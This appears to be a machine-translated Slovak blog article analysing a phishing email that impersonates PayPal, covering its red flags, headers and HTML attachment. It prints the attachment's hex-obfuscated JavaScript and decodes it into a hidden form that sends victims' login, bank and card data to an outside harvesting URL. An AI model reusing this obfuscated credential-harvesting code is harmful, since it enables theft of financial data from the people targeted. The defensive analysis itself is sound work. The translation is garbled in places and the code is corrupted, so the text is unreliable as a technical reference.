10Sep
V dnešnom svete, kde sú všetky informácie online, je phishing jedným z najpopulárnejších a ničivých online útokov, pretože vždy môžete vyčistiť vírus, ale ak sú vaše bankové údaje ukradnuté, máte problémy. Tu je rozpis jedného takého útoku, ktorý sme dostali.
Nemyslite si, že sú to len dôležité bankové údaje: Nakoniec, ak niekto nadobudne kontrolu nad prihlasovaním do účtu, nevie iba informácie obsiahnuté v danom účte, ale pravdepodobne sú rovnaké prihlasovacie informácie, ktoré sa môžu použiť na rôznychostatné účty. A ak kompromitujú váš e-mailový účet, môžu obnoviť všetky ostatné heslá.
Takže okrem udržiavania silných a rôznorodých hesiel musíte byť vždy na pozore falošných e-mailov, ktoré sa prelínajú ako na skutočnú vec. Zatiaľ čo väčšina pokusov o phishing je amatérske, niektoré sú dosť presvedčivé, takže je dôležité pochopiť, ako ich rozpoznať na úrovni povrchu, ako aj ako fungujú pod kapotou.
Image by asirap
Skúmanie Čo je v zjednodušenom pohľade
Náš príklad e-mailu, podobne ako väčšina pokusov o neoprávnené získavanie údajov, vás upozorní na aktivitu vášho účtu PayPal, ktorá by za normálnych okolností bola alarmujúca. Takže výzva na akciu je overiť / obnoviť váš účet odoslaním takmer každý kus osobných informácií, o ktorých si môžete myslieť.Opäť je to dosť formálne.
Aj keď sú určite výnimky, skoro každý phishing a podvod je e-mailom načítaný červenými vlajkami priamo do správy sami. Aj keď je text presvedčivý, zvyčajne môžete nájsť veľa správnych chýb v tele správy, ktoré naznačujú, že správa nie je legitímna.
Telo správy
Na prvý pohľad je to jeden z lepších e-mailov s phishingom, ktoré som videl. Neexistujú žiadne pravopisné alebo gramatické chyby a verbiage číta podľa toho, čo by ste mohli očakávať.Existuje však niekoľko červených vlajok, ktoré môžete vidieť pri podrobnejšom preskúmaní obsahu.
- "Paypal" - Správny prípad je "PayPal"( kapitál P).V správe sa môžu zobraziť obidve varianty. Spoločnosti sú so svojou značkou veľmi zámerné, takže je pochybné, že by sa niečo takéto prejavilo procesom kontroly.
- "povoliť ActiveX" - koľkokrát ste videli legit webovú firmu veľkosti Paypal používať proprietárnu súčasť, ktorá funguje iba v jednom prehliadači, najmä keď podporujú viac prehliadačov? Určite, niekde tam niečo podnikne, ale je to červená vlajka.
- "bezpečne". - Všimnite si, ako toto slovo nie je zarovnané na okraji so zvyškom textu odseku. Dokonca aj keď roztiahnem okno o niečo viac, nezakrýva ani správne miesto.
- "Paypal!" - Priestor pred výkričníkom vyzerá nepríjemne. Len ďalší problém, ktorý som si istý, že nebude v legitímnom e-maile.
- "PayPal - Formulár aktualizácie účtu.pdf.htm" - Prečo by Paypal priložil "PDF", najmä ak by mohli len odkazovať na stránku na svojich stránkach? Navyše, prečo by sa pokúsili zamaskovať súbor HTML ako PDF?Toto je najväčšia červená vlajka všetkých z nich.
Hlavička správy
Keď sa pozriete na hlavičku správy, zobrazí sa niekoľko červených vlajok:
- Adresa je [email protected].
- Chýba adresa. Nerobila som to, jednoducho nie je súčasťou štandardnej hlavičky správy. Zvyčajne spoločnosť, ktorá má vaše meno, vám email prispôsobí.
Príloha
Keď prílohu otváram, môžete ihneď vidieť, že rozloženie nie je správne, pretože chýba informácia o štýle. Opäť platí, prečo by PayPal poslal e-mailovú adresu vo formáte HTML, keď by mohol jednoducho dať odkaz na svojich stránkach?
Poznámka: sme pre tento účel použili vstavaný prehliadač príloh HTML v službe Gmail, ale odporúčame, aby ste neodpovedali na prílohy od podvodníkov. Nikdy. Ever. Veľmi často obsahujú zneužitie, ktoré nainštalujú trójske kone do počítača, aby ste ukradli informácie o vašom účte.
Posúvanie o niečo viac, môžete vidieť, že tento formulár sa spýta nielen na naše prihlasovacie informácie služby PayPal, ale aj na informácie o bankovníctve a kreditnej karte. Niektoré obrázky sú rozbité.
Je zrejmé, že tento pokus o phishing prekonáva všetko s jedným zásahom.
Technický rozpis
Zatiaľ čo by malo byť celkom jasné, na základe toho, čo je jasné, že ide o pokus o neoprávnené získavanie údajov, teraz rozdelíme technickú štruktúru e-mailu a uvidíme, čo môžeme nájsť.
Informácie z prílohy
Prvá vec, na ktorú sa pozriete, je zdroj HTML formu prílohy, ktorý predkladá údaje na falošnú stránku.
Pri rýchlom prehliadaní zdroja sa všetky odkazy zobrazujú ako platné, pretože poukazujú na "paypal.com" alebo "paypalobjects.com", ktoré sú obaja legitímni.
Teraz sa pozrieme na niektoré základné informácie, ktoré Firefox zhromažďuje na stránke.
Ako vidíte, niektoré grafiky sú namiesto legitných domén PayPal vytiahnuté z domén "blessedtobe.com", "goodhealthpharmacy.com" a "pic-upload.de".
Informácie z hlavičky e-mailu
Ďalej sa pozrieme na hlavičky surovej e-mailovej správy. Služba Gmail to sprístupňuje prostredníctvom možnosti Zobraziť ponuku originálu v správe.
Pri pohľade na informáciu o hlavičke pôvodnej správy môžete vidieť, že táto správa bola zostavená pomocou programu Outlook Express 6. Pochybujem, že služba PayPal má niekoho v zamestnancoch, ktorý každú z týchto správ posiela ručne prostredníctvom zastaraného e-mailového klienta.
Pri pohľade na informácie o smerovaní môžeme vidieť IP adresu odosielateľa i servera na odosielanie správ.
IP adresa "User" je pôvodný odosielateľ.Pri rýchlom vyhľadávaní informácií o IP vidíme, že odosielanie IP sa nachádza v Nemecku.
A keď sa pozeráme na adresu mailového servera( mail.itak.at) vysielajúcej pošty, môžeme vidieť, že ide o ISP so sídlom v Rakúsku. Pochybujem, že služba PayPal smeruje svoje e-maily priamo prostredníctvom poskytovateľa internetových služieb v Rakúsku, keď majú masívnu serverovú farmu, ktorá by mohla túto úlohu ľahko zvládnuť.
Kde sa dáta pohybujú?
Takže sme jasne zistili, že ide o phishingovú e-mailovú správu a zhromaždili sme informácie o tom, odkiaľ pochádza správa, ale čo sa týka odosielania vašich údajov?
Ak chcete vidieť to, musíme najskôr uložiť prílohu HTM do našej pracovnej plochy a otvoriť ju v textovom editore. Prechádzať to, všetko sa zdá byť v poriadku, až kým sa nedostaneme k podozrivému hľadaniu bloku Javascript.
Vypnutie úplného zdroja posledného bloku jazyka Javascript, vidíme:
& lt; script language = "JavaScript" typ = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; pre( i = 0; i-x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Kedykoľvek uvidíte veľkú mŕtvy reťazec zdanlivo náhodných písmen a čísel vložených do bloku Javascript, je to zvyčajne niečo podozrivé.Pri pohľade na kód sa premenná "x" nastaví na tento veľký reťazec a potom sa dekóduje do premennej "y".Konečný výsledok premennej "y" sa potom do dokumentu zapíše ako HTML.
Pretože veľké vetve je z čísel 0-9 a písmená AF, je s najväčšou pravdepodobnosťou zakódovaný pomocou jednoduchého ASCII ku konverzii Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
prekladá:
& lt; názov forma = "hlavný" id = "hlavné"method = "post" akcia = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Nie je to náhoda, že to dekóduje do platného tagu formátu HTML, ktorý posiela výsledky nie na PayPal, ale na nečestnú stránku.
Okrem toho pri zobrazení zdroja HTML formulára uvidíte, že táto značka formulára nie je viditeľná, pretože je generovaná dynamicky cez Javascript. Je to šikovný spôsob, ako skryť to, čo HTML skutočne robí, ak niekto jednoducho prezradí generovaný zdroj prílohy( ako sme robili predtým), na rozdiel od otvorenia prílohy priamo v textovom editore.
Spúšťanie rýchleho whois na stránkach, ktoré porušujú pravidlá, môžeme vidieť, že ide o doménu hosťovanú na populárnom webovom hostiteľovi 1and1.
Čo vyniká, doména používa čitateľný názov( na rozdiel od niečoho ako "dfh3sjhskjhw.net") a doména bola zaregistrovaná už 4 roky. Preto sa domnievam, že táto doména bola v tomto pokusu o phishingu unesená a použitá ako pešiak.
Cynizmus je dobrá obrana
Keď príde na bezpečnosť online, nikdy to neublíži, že má dobrý cynizmus.
Aj keď som presvedčený, že v príkladovom e-maile je viac červených vlajok, to, čo sme uviedli vyššie, sú ukazovatele, ktoré sme videli po niekoľkých minútach skúšky. Hypoteticky, ak by úroveň povrchu e-mailu napodobňovala jeho legitímnu protihodnotu 100%, technická analýza by ešte odhalila jej skutočnú povahu. Preto je dôležité, aby ste mohli skúmať to, čo môžete a čo nemôžete vidieť.
